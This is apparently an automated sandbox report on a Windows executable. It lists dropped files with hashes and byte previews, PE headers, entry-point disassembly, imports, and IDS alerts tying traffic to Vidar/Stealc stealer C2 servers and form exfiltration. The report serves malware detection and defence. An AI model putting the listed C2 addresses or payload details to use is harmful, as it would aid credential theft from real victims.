                                                                                      SHA-256:4132EC7F7053930842FDF109B944306698087960439ED34C0EA4AF8D72E62DED
                                                                                      SHA-512:C5F9027FF61952353BF423ECE60348BA31A8D7B056ABEEF99708E29AC8199BCD2035F4BE2A411ACC4FCEDAAA7DF481BB1E031C632935CFCCF110FC5AA6361CAF
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):892629
                                                                                      Entropy (8bit):6.622545718722573
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:HpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:HTxz1JMyyzlohMf1tN70aw8501
                                                                                      MD5:44F893AC56AB6A3DACAC37928E513292
                                                                                      SHA1:BDDFD7E26C070315A52AED66C58660AB972DDDF7
                                                                                      SHA-256:8959FAFFF952490148BCDB0EB16F8D73CCCC82332BE950CDE0DDF47FE045CE23
                                                                                      SHA-512:775F8A39FC4C60E7BBD5035D8A52038A0C741FADCBCFE8297E418AB977E063DA34D61B48BB0EC84299E3312CE33E6CB133FA953F0B393F77842EF9716E8F921E
                                                                                      Malicious:false
                                                                                      Preview:..............................................DaL.....h..C..\...Y...L..h..C..K...Y..N..h..C..:...Y.h..C......Y..<C..h..C......Y.....h..C......Y.Q.>...h..C......Y..sL.Q.@...sL.P.9...h.C......Y..G..h.C......Y...(..h.C.....Y..4..h.C.....Y...L..2...h.C.....Y................SVW..j.[..l............Ky.Nl.....N(....V.;...Y_..^[...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd....j....................F|U............[...U......Ky......3........................l.....p.....t.....x.....|...........................f.............................................................._......^[.U..QQ.E....I.Pj.hD.I..............f.}.1.....].U..QQ.}..SVtr.u...tk3.3.f...E.Pj.SRQ....I...uQ.E.W.<..E..}.PVSS.u..u... .I...u..E...E.;E.s.3.f..F...u.....I..._^[..].3.f.D7...2...U..SV..j.[.F.9F.u0...j.X;.sL3.F...W.......Q.....~....Y......~._S......Y..t..M......N..F.....F.^[]......3...V...N..V..F..4.......F.Y.N.^.$...V..W3.9~........f.._^.V....h.I.....
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1011
                                                                                      Entropy (8bit):3.200344146341136
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:Imkd5yGSGCbTQxbs/0pQHPZdsLq6h1b5zGbWCBl9dte4:IfnyGSnPQxqtPMLqCj8WCBl9dte4
                                                                                      MD5:D3C964C6EA585D3E9B35832FDC06FDB4
                                                                                      SHA1:3CB85C5EBE13F948BE849DB25982F19D0B21A05D
                                                                                      SHA-256:8B7E7F699E440F6E42AC2AA48E3504DC1C2ED6FC6E7A98E2498D99DCC79E484F
                                                                                      SHA-512:37DE8D3542A6F6D15849774ABDC35B654A52722605E906145017445DE8686B33BBEF4E6B48AD2BD9ED475751CAB29BD42E8C250B5DD00BBD8E17EA42A5ECF76F
                                                                                      Malicious:false
                                                                                      Preview:NorwegianLivedJerseyRelaxation..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):21929
                                                                                      Entropy (8bit):7.9917254746338
                                                                                      Encrypted:true
                                                                                      SSDEEP:384:2Yli0yKpahDnvZyyrj1QyGvAsJU46l558h5DCjPwl9gBVU6JVjeCffM4Mp:dc0yKmnvZymMJU46l/y5DCjCQ5VKCff4
                                                                                      MD5:F0BB9C59AA330F8B9A273AF5A13B2B17
                                                                                      SHA1:9953AC1402C4556046C37B7B0A818C1C920C0154
                                                                                      SHA-256:DBB97494D51748E748F8528BEFA8097C83107BE9F24D96EAE3D437220DBEF324
                                                                                      SHA-512:7FED666274E66461F2692C5CFE7F643C9D9E931F2262D18D0518299BCE5973F9907DB6BF0EC24A2AA659F7772E6A9C42A8F4882EBEE7EA2E09E4A1FF7D57DAD1
                                                                                      Malicious:false
                                                                                      Preview:.x....F.....(....:.........BNY.....6$+..\[c/.!i.....`.'M.^.:.......5..,MS.4bt..W.T...yE-..'..GF|.Q.9....i....<.~..T....+t..L.4.....t.c.I|....hM..U.|....1V.j...... .3.Z.Yi(.U/.o`.....6..r.......[.TP..X.1.]...Rz.&.h.@..g....4..>...U....G......,...6..v$<g...Ti.c.4^..G(k..7C&,.qB........uB.....7...\..L".....6.S....0.*.........]w.{e..(`.O...Q.@...&.......do...Y.3....O..(.=..PE..SH....0.9h..IB..W.....+K.;p...Y..;...z..AO6.@p.V"h._....:..;^cA...W....y.%.Aq.f.D..k.^.X..k4.....4y:.=i!.94.....#......D`.%.<.Mh.j..[.9....G^...;..d.}..j $.....x._...KJg....[..-K..p..\_..?....Q.9#<?2.Q.V#.E..X....K.\...i'..Q..T.(..._..ib4..5.i2...w....#.y.{..'?v...E..)..E..o3!.e...O6.E..X.^....f.so.y.....w.V.o..[W.I...m...R%G...j.W.e... ...Yd.......7:c......j./{*S..'@......m<x>I...m.N0...I..-..&...O#p@p.......3-.i.f..YA..m#...h..L..\.......~...G...[.$......H..wF.E....Q.....*....Lc;.Q..\...U4.F;.$..KQ..%.g.".}o....c|E....>.W,.we.....s....IU......E..^e+.S.Mw.&3.....sL.
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):82944
                                                                                      Entropy (8bit):7.9974914813164295
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:x+LKKw8HO2PCYo0UIMoPUcDRnnKHBst+tMnBU1YPeqp:4L3PCYoIMoP5RK2+tMnBU0ec
                                                                                      MD5:8DCAD160314DB7EF9908F09247C4623C
                                                                                      SHA1:8DD90A69427B679F0A151FC1593A34767C381487
                                                                                      SHA-256:1E4C86861AC03CA910FB4F3C48F5B073B2E4D6F192C7F71D085E54C4FB50B6E9
                                                                                      SHA-512:72B21754F6B604DC47DD71625402883C0DE0E5A0520CBFE612011E4D740D214BB0959DE7E192164BFE1B522D1AB8377C5C9C03B0C7FE61E76E579281A9667201
                                                                                      Malicious:false
                                                                                      Preview:W.:.\...X..h..%....H......=..w..J..eX...c..BE..+dX..)..6F....V.n....mN...%....O.9......6.^...?.3$....).IiMb$..,.,....Pq{=".....m.]......Ei.l_V.S...?...3g...Hn......cP.fc6.0N!r.j....!..k.k...8..+\y3....).G.......?.....=i..w..:\.(.X.HR.r...r.IW.E...t +.4..S.....!}.R.6.6f.N.(........[.....h..G...!..(...oc.D=.....].9lOd..\hq.,.2...Z....]H.*_.dZ...UJ.F._..K..w(..>.^q..._.Ow.{'......S..f...*jc"K..D8cq.[....u....Le/F.....|.J.*1,.ym.l...;.q2.O.....^.%dk...._*]S.gU.o|`..A....W..!'F.l._.|>{.H.r.{N".o.pr}.U..P:"d.,2=.9/U..P"\.be.b.g...;...R~...~.b.O..-.i.....(5.\]..Mj].....\.[..a......^...|.j....J:.....e..Ge%.....@0.<5v......N./..Z.d.2.._. ....vv.V.}..>w~......[...^../..!w.\.s..wM.}.@.&^'....W...jS..r.#..Z..=.4BU.V\...#.KZ.....X.........fr.....c..c.}L$..<%..Q..Dg...L..&.PG....wR..Z^:......;w.dd/...l]..t....=..PYd~..)...C..R.m.u}..v...:k...C^|Nf...E.f........(.eHd....V7......yy$P....#=...n.#fv.......1...HH....\...a......qB..@.W..7j9.^.<.%*\..._7.
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):82944
                                                                                      Entropy (8bit):7.997827426624509
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:W1tfAe9pUP8QoT0BX1ABOe1p3fSI9iUFEl8pN4G5cBOcZV:W1bYBSmFABp1p3tiUF48DJg
                                                                                      MD5:1376D8F8BCD859620D17D2199452883B
                                                                                      SHA1:3C1F24447D68084F364E750E0ECAE3F5667CA537
                                                                                      SHA-256:A06ADBF1F68A296D9049E5AB4FA8DEBF0F68A29E37ED1CEB5481D8F15F85033A
                                                                                      SHA-512:FE0A1F6A48A1B5A404B289320D27FBCCD67F1DE4080081D7E4E3B93611BC0ECE52636276BDB2FBB5E32F3662640536E9CFFA6C86C0D3F41041309D7386B0B36B
                                                                                      Malicious:false
                                                                                      Preview:..E..^..N [5.....AO.x.<C%...p.-o...U....#|.G.v...Z;..~.. .....o...].8.....RE.k..0IJLb.....L1.(...W...dp.W.%n..Z[z&.\mQ.@.K..5)n].....}..\..G....5...q..-f............q.A....m.@>..z..,.r.b.=S(.*...t..p.q.h..&.^..._8...I.u....Yb!*..<.M...*.;..[...........#.@PP.....D.....b.c]..P.F.....#g.R....x.6EJXc.OE..Pq.xJtN........=......o&<...`.@..\....F....%..y...^R..H..<.|....c.V..J.r..R....~....[._..^....&.(..@l.^...nD................H o..X?k..kY.-|...q.....4.D..H.q.p..l)SH..I.O.....!_Zi.]....n&......i'Gw....e.-ml.$Pm9..S...]...V..+r.<...O..o.X}.)..._....1.B.TB..n.B.7.....(.t......z-]6..}....`..;.....M..f.5by.Z.B.4....0..J..w...0(..,'..j...BS..hu&l..H.....)j...).T....1q...z....V~).U.A4.l.1@_]04*W.l9..ij........>.S....m...1~..E.b.`.D~..t.h...=%J.v.W..)....7........+.;X.Vh.....4.Mdt.+7.<...a..]+k.$;.p5M...W.,.F.m...Ao..2..6*G...t.....*.)A...E*.E...m=h.Q..d.....2.Xm........P.5..m.8/...........X>.q..l.>.R..m..$....x.w...f.=Vd.'...3...@..(...._f..#y.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1048575
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:DLLf:z
                                                                                      MD5:7B917A7B012EB5A9F993CD2C67334ECE
                                                                                      SHA1:4F0CA9CA2848ECC2B9AA7A5E22949DB338B803EA
                                                                                      SHA-256:F3CDA3194964C8B6A28E4B57518DA8DD58A47BD0FD92FF5C3E5ECBE123A00265
                                                                                      SHA-512:64BFF80F278D832BAD2199911B012CD1666ACA2FA74C1C88B1067BA8652D8A27488A756249D59C6D1DDA6A4122DA7635D19AC3800ED12587AC0D21B42F5F25DE
                                                                                      Malicious:false
                                                                                      Preview:nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                      Category:dropped
                                                                                      Size (bytes):1835008
                                                                                      Entropy (8bit):4.418972280455513
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:xSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNd0uhiTw:IvloTMW+EZMM6DFyn03w
                                                                                      MD5:E760BD1426673F6F2C66213918A472BA
                                                                                      SHA1:7CF84566534638CBB843DEDEEF8A9D5817C16C3F
                                                                                      SHA-256:522C74EEFC0970600B605A9E2F68AC4AF40589E3EBA676FFE15484BAFBAC9337
                                                                                      SHA-512:DB4B560EBBD75F6D2C4F4095EF3C1C458AEFBFA9E508504F09952759F9A2EB80FB33FDB45BE48BBADB87E02D605663094DBDA43E2DC707427A0D805A2873BED7
                                                                                      Malicious:false
                                                                                      Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.q.AD...............................................................................................................................................................................................................................................................................................................................................Xq.u........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):7.830131541214044
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:file.exe
                                                                                      File size:913'051 bytes
                                                                                      MD5:2f5226b4116ce79afb6dcb32fa647954
                                                                                      SHA1:15f395c9a4a894a660d318a6779094d311f0a1f7
                                                                                      SHA256:8febc589fc4de7b009d3e406fddba66e389d5544bc5fad44d03f712ebf6c2bfa
                                                                                      SHA512:7fe94c2adf2d5526a9798b1fddf62984b49787b5c0ed2e9ef2aeb765ba9922ecda8d71fe7966452b3e84a4b84e37096f5dd9c0e700f99dc94fe5d261c36c1013
                                                                                      SSDEEP:24576:tEbCyouWvEBYeO3QnE4t4BVb5iaSHLKvm+pq6GabL8Z:2WpM4apHLCm+M6l/o
                                                                                      TLSH:C91523E482D0A176FEF70E3266B119520876BC4650A2A50E97C574BF7C771C8A43FB27
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....
                                                                                      Icon Hash:06dcd978e6e99882
                                                                                      Entrypoint:0x403883
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:5
                                                                                      OS Version Minor:0
                                                                                      File Version Major:5
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:5
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                      Instruction
                                                                                      sub esp, 000002D4h
                                                                                      push ebx
                                                                                      push ebp
                                                                                      push esi
                                                                                      push edi
                                                                                      push 00000020h
                                                                                      xor ebp, ebp
                                                                                      pop esi
                                                                                      mov dword ptr [esp+18h], ebp
                                                                                      mov dword ptr [esp+10h], 00409268h
                                                                                      mov dword ptr [esp+14h], ebp
                                                                                      call dword ptr [00408030h]
                                                                                      push 00008001h
                                                                                      call dword ptr [004080B4h]
                                                                                      push ebp
                                                                                      call dword ptr [004082C0h]
                                                                                      push 00000008h
                                                                                      mov dword ptr [00472EB8h], eax
                                                                                      call 00007FE930908C1Bh
                                                                                      push ebp
                                                                                      push 000002B4h
                                                                                      mov dword ptr [00472DD0h], eax
                                                                                      lea eax, dword ptr [esp+38h]
                                                                                      push eax
                                                                                      push ebp
                                                                                      push 00409264h
                                                                                      call dword ptr [00408184h]
                                                                                      push 0040924Ch
                                                                                      push 0046ADC0h
                                                                                      call 00007FE9309088FDh
                                                                                      call dword ptr [004080B0h]
                                                                                      push eax
                                                                                      mov edi, 004C30A0h
                                                                                      push edi
                                                                                      call 00007FE9309088EBh
                                                                                      push ebp
                                                                                      call dword ptr [00408134h]
                                                                                      cmp word ptr [004C30A0h], 0022h
                                                                                      mov dword ptr [00472DD8h], eax
                                                                                      mov eax, edi
                                                                                      jne 00007FE9309061EAh
                                                                                      push 00000022h
                                                                                      pop esi
                                                                                      mov eax, 004C30A2h
                                                                                      push esi
                                                                                      push eax
                                                                                      call 00007FE9309085C1h
                                                                                      push eax
                                                                                      call dword ptr [00408260h]
                                                                                      mov esi, eax
                                                                                      mov dword ptr [esp+1Ch], esi
                                                                                      jmp 00007FE930906273h
                                                                                      push 00000020h
                                                                                      pop ebx
                                                                                      cmp ax, bx
                                                                                      jne 00007FE9309061EAh
                                                                                      add esi, 02h
                                                                                      cmp word ptr [esi], bx
                                                                                      Programming Language:
                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                      • [ C ] VS2010 SP1 build 40219
                                                                                      • [RES] VS2010 SP1 build 40219
                                                                                      • [LNK] VS2010 SP1 build 40219
                                                                                      Name                                 | Virtual Address | Virtual Size | Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x9b34          | 0xb4         | .rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0xf4000         | 0x10800      | .rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x7a000         | 0x964        | .ndata
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT            | 0x8000          | 0x2d0        | .rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6dae | 0x6e00 | 5536fb96dce1fc25008d6e8d93a3103a | False | 0.6611150568181818 | data | 6.508600512123772 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x2a62 | 0x2c00 | 07990aaa54c3bc638bb87a87f3fb13e3 | False | 0.3526278409090909 | data | 4.390535020989255 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xb000 | 0x67ebc | 0x200 | 014871d9a00f0e0c8c2a7cd25606c453 | False | 0.203125 | data | 1.4308602597540492 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x73000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xf4000 | 0x10800 | 0x10800 | d5b049b301fc2bf6699f28694a6c3864 | False | 0.3453184185606061 | data | 3.663462778688186 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x105000 | 0xf32 | 0x1000 | 0e6c3aeb889763ebb8911cca274dd9be | False | 0.32958984375 | data | 2.9502214104290445 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xf41f0 | 0x9928 | Device independent bitmap graphic, 96 x 192 x 32, image size 39168 | English | United States | 0.3275351968985921
RT_ICON | 0xfdb18 | 0x5638 | Device independent bitmap graphic, 72 x 144 x 32, image size 22032 | English | United States | 0.35039869517941286
RT_ICON | 0x103150 | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | English | United States | 0.4326047358834244
RT_DIALOG | 0x104278 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x104378 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x104498 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x1044f8 | 0x30 | data | English | United States | 0.875
RT_MANIFEST | 0x104528 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193
DLL | Import
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
2024-08-29T20:49:45.709612+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 59952 | 443 | 192.168.2.5 | 94.130.188.148
2024-08-29T20:49:55.420274+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 59957 | 443 | 192.168.2.5 | 94.130.188.148
2024-08-29T20:49:22.722325+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 59938 | 443 | 192.168.2.5 | 94.130.188.148
2024-08-29T20:49:27.286287+0200 | TCP | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 1 | 443 | 59941 | 94.130.188.148 | 192.168.2.5
2024-08-29T20:50:03.661659+0200 | TCP | 2054495 | ET MALWARE Vidar Stealer Form Exfil | 1 | 59961 | 80 | 192.168.2.5 | 95.164.119.162
2024-08-29T20:49:29.365044+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 59943 | 443 | 192.168.2.5 | 94.130.188.148
2024-08-29T20:49:52.374206+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 59955 | 443 | 192.168.2.5 | 94.130.188.148
2024-08-29T20:49:34.489806+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 59945 | 443 | 192.168.2.5 | 94.130.188.148
2024-08-29T20:49:51.411352+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 59954 | 443 | 192.168.2.5 | 94.130.188.148
2024-08-29T20:50:01.060380+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 59960 | 443 | 192.168.2.5 | 94.130.188.148
2024-08-29T20:49:27.945326+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 59942 | 443 | 192.168.2.5 | 94.130.188.148
2024-08-29T20:49:23.881214+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 59939 | 443 | 192.168.2.5 | 94.130.188.148
2024-08-29T20:49:26.574584+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 59941 | 443 | 192.168.2.5 | 94.130.188.148
2024-08-29T20:49:30.969182+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 59944 | 443 | 192.168.2.5 | 94.130.188.148
2024-08-29T20:49:37.787326+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 59948 | 443 | 192.168.2.5 | 94.130.188.148
2024-08-29T20:49:58.900576+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 59959 | 443 | 192.168.2.5 | 94.130.188.148
2024-08-29T20:49:42.053985+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 59950 | 443 | 192.168.2.5 | 94.130.188.148
2024-08-29T20:49:36.478659+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 59947 | 443 | 192.168.2.5 | 94.130.188.148
2024-08-29T20:49:56.817977+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 59958 | 443 | 192.168.2.5 | 94.130.188.148
2024-08-29T20:49:47.284094+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 59953 | 443 | 192.168.2.5 | 94.130.188.148
2024-08-29T20:49:25.234179+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 59940 | 443 | 192.168.2.5 | 94.130.188.148
